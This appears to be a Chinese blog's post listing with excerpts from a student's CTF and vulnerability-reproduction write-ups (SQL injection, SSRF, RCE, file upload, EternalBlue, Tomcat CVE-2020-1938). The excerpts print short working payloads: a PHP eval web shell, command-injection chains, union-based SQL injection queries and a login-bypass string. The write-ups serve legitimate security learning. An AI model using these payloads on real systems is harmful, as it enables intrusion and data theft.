- 博客(19)
- 收藏
- 关注
原创 腾讯云服务器centos7.9搭建msf以及利用过程
一路踩坑过来,记录一下,愿世间不再有坑呜呜呜。在 /opt 目录下输入安装好之后输入msfconsole,查看是否安装成功虽然centos系统自带Postgresql数据库,但是不能直接用(我也不知道为什么),所以需要先卸载。2.安装新版Postgresql三、msf连接Postgresql1.不能以root用户初始化数据库,创建一个用户msf对其初始化2.切换到root,用msf用户的数据库配置覆盖原配置3.测试是否连接正常进入msf,输入 db_status另外准备一台靶机,或者
2022-07-08 17:42:04
4053
5
原创 CVE-2020-1938 漏洞复现
漏洞描述Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat 7.0.100之前的7.*版本、8.5.51之前的8.*版本和9.0.31之前的9.*版本中的Tomcat AJP协议存在文件包含漏洞。攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp 配置文件或源代码等。影响版本Apache Tomcat
2022-05-21 12:40:00
3548
1
原创 记录JIS-CTF: VulnUpload解题过程
JIS-CTF: VULNUPLOADName: JIS-CTF: VulnUpload Date release: 8 Mar 2018
2022-05-03 20:45:24
1490
原创 CTFHub技能树笔记之WEB-SQL:时间盲注
小白一个,如有错误请指正这里使用两种解法1.python脚本2.sqlmap一、需要用到的函数:length() //返回字符串的长度ascii() //返回一个字符的ascii码值substr(字符串,开始位置,截取数量)//截取字符串sleep() //时间注入的核心函数if(判断语句,语句一,语句二) ...
2022-04-08 20:40:10
4104
原创 永恒之蓝漏洞复现
简单写一下以前老师布置的作业,如有错误请指正!一、什么是永恒之蓝永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。二、环境准备1.一台win7
2022-04-05 23:20:49
3719
原创 CTFHub技能树笔记之SSRF:POST请求、文件上传
知识点:1.什么是gopher协议1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。2.它只支持文本,不支持图像3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。2.gopher使用结
2022-04-03 13:43:13
9343
6
原创 CTF技能树笔记之WEB-SQL注入:布尔盲注
小白一个,如有错误请指正!一、布尔注入盲注有三种解法:1.sqlmap2.python脚本3.手注这里我就用sqlmap和脚本(手注真的会累死人的有木有?)解法一:sqlmap我们只需要按步骤来就可以了sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 --dbssqlmap -u http://challenge-00cfdd6ec4589579.sandbo
2022-04-02 11:07:49
2881
原创 CTFHub技能树笔记之SSRF:内网访问、伪协议读取文件、端口扫描
小白一个,记录解题过程,如有错误请指正!补充知识点:1.什么是SSRF SSRF(Server-Side Request Forgery:服务器跨站请求),是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内网。也就是说可以利用一个网络请求的服务,当作跳板进行攻击)2.SSRF产生的原因SSRF 形成的原因往往是由于服务端提供了从其他服务器应用...
2022-03-31 23:48:37
9251
2
原创 CTFHub技能树笔记之RCE:过滤目录分隔符、过滤运算符、综合过滤练习
小白一个,记录解题过程,如有错误请指正!一、过滤目录分隔符1.查看当前目录2.有提示,进去看一下127.0.0.1;ls flag_is_here3.根据经验知道我们只要访问到php文件的内容就可以拿到flag了思路:这里我们可以用&&运算符将命令连接起来就能成功拿到flag127.0.0.1;cd flag_is_here&&cat flag_19900138617064.php|base64二、过...
2022-03-29 18:38:00
2884
原创 CTFHub技能树笔记之RCE:命令注入、过滤cat、过滤空格
小白一个,记录解题过程,如有错误请指正!一、命令注入补充知识点:命令行注入漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。Windows系统支持的管道符如下:1. “|”:直接执行后面的语句。2. “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。3. “&”:两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。4. “&&...
2022-03-28 19:03:53
9816
3
原创 CTFHub笔记之技能树RCE:eval执行、文件包含、远程包含、php://input、读取源代码
小白一个,如有错误请指正!一、eval执行?cmd=system("ls");?cmd=system("ls%20/");?cmd=system("cat%20/flag_26396");
2022-03-28 16:40:17
5014
原创 BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL
小白一个,记录一下解题过程,如有错误请指正!一、EasySQL1.这里我们使用一句话万能密码就可以了,记得加上#1' or '1'='1'#2.登录就可以拿到flag二、LoveSQL网页里说用sqlmap是没有灵魂滴,但是还是手痒试了一下,发现什么都扫不出来,可能是我太菜了能力还没到家,希望有大佬能指点一下~1.我们只能运用灵魂了,用万能句尝试一下,发现登录进来了,但是没有flag2.猜测flag应该是放在某个字段里了,我们用联合注入(un...
2022-03-26 11:42:11
2833
原创 CTFHub笔记之WEB文件上传:无验证、前端验证、文件头检查
小白一个,如有错误请指正!一、无验证我们这次来到了文件上传模块了,这是一个无验证的文件上传,那我们直接上传一个一句话木马即可。代码:<?php @eval($_REQUEST["shell"]);?>1.我们在桌面创建一个shell.txt文件,输入代码后将后缀改成.php,然后将文件上传。2.在这里我们得知上传的路径是:http://challenge-620c59fde44f34b7.sandbox.ctfhub.com:10800...
2022-03-22 16:51:16
2823
原创 CTFHub笔记之技能树 WEB:过滤空格
小白一个,如果错误请指正!首先我们常规的去注入一下,发现之前使用的句子行不通,原因是空格键被过滤掉了。那我们就得去学习一下怎么绕过空格过滤:SQL注入绕过技巧 - VVVinson - 博客园1.绕过空格(注释符/* */,%a0): 两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方https://www.cnblogs.com/Vinson404/p...
2022-03-21 15:56:31
2442
原创 CTFHub技能树之WEB:UA注入
小白一个,如有错误请指正!UA就是User-Agent的缩写,中文名为用户代理,是Http协议中的一部分,属于头域的组成部分,它是一个特殊字符串头,是一种向访问网站提供你所使用的浏览器类型及版本、操作系统及版本、浏览器内核、等信息的标识。通过这个标识,用户所访问的网站可以显示不同的排版从而为用户提供更好的体验或者进行信息统计。 个人感觉UA注入和Cookie注入是有点像的,都是从请求头中修改参数,payload和普通的union注入是一样的。解法一: Burps...
2022-03-20 22:25:50
2259
原创 CTFHub技能树之WEB:Cookie注入
小白一个,如有错误请指正!解法一:使用Burpsuite抓包1.设置好Burpsuite后开始抓包 鼠标右键点击Send to Repeater2.在Repeater界面发送数据包,发现可以看到返回的数据3.可以发现Cookie的id可以传值,那我们通过Cookie进行注入 发现只有2个字段有回显有回显没有回显4.爆数据库id=123 union select 1,database()#5.爆表名id=123 union select 1...
2022-03-20 21:42:47
1682
原创 CTFHub技能树之WEB MYSQL结构
小白一个,如有错误请指正!解法一:1.这里还是老方法,输入 1, 2 ,3 ,得知字段有两个2.爆数据库select * from news where id=123 union select 1,database()#3.爆表名select * from news where id=123 union select 1,group_concat(table_name) from information_schema.tables where table_schema..
2022-03-20 21:16:32
1498
原创 CTFHub笔记之技能树-web:报错注入
小白一个,如有错误请指正!对这方面不是很熟悉,补了一下知识点:https://blog.youkuaiyun.com/silence1_/article/details/90812612https://blog.youkuaiyun.com/silence1_/article/details/90812612解法一:1.用extractvalue()函数爆数据库select * from news where id=1 and (select extractvalue(1,concat(0x7e,(select
2022-03-19 18:02:32
467
原创 CTFHub笔记之技能树WEB-字符型注入
小白一个,如有错误还请各位大佬指正!解法一:手搓1.输入1和2都有回显,3没有回显,得知数据库只有两个字段。开始构造payload,暴个数据库看看123' union select 1,database()#2.发现目标 爆个表名看看123' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'sqli' #'3.发现名为flag的表 冲啦兄.
2022-03-19 16:51:02
404
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人